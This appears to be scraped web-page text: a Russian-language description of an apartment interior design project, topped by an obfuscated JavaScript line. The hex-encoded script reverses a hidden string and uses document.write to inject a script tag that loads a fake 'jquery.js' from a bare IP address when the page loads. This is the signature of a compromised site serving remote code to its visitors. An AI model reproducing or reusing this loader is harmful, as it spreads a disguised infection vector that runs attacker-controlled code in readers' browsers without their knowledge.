var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Заказчики хотели видеть свое жилье более приспособленным к их ритму жизни, не меняя планировки в целом. Дизайн – проект создавался для гостеприимной семьи, при этом ценящей личное пространство.

Поэтому при планировке квартира четко разделилась на общественную и приватную зону. Первую составляют кухня и гостиная, соединённая проходом, который закрывается стеклянными раздвижными дверями. Вторую - хозяйская и детская спальни.

В гостиной организовалась и рабочая зона, а также зона отдыха с камином.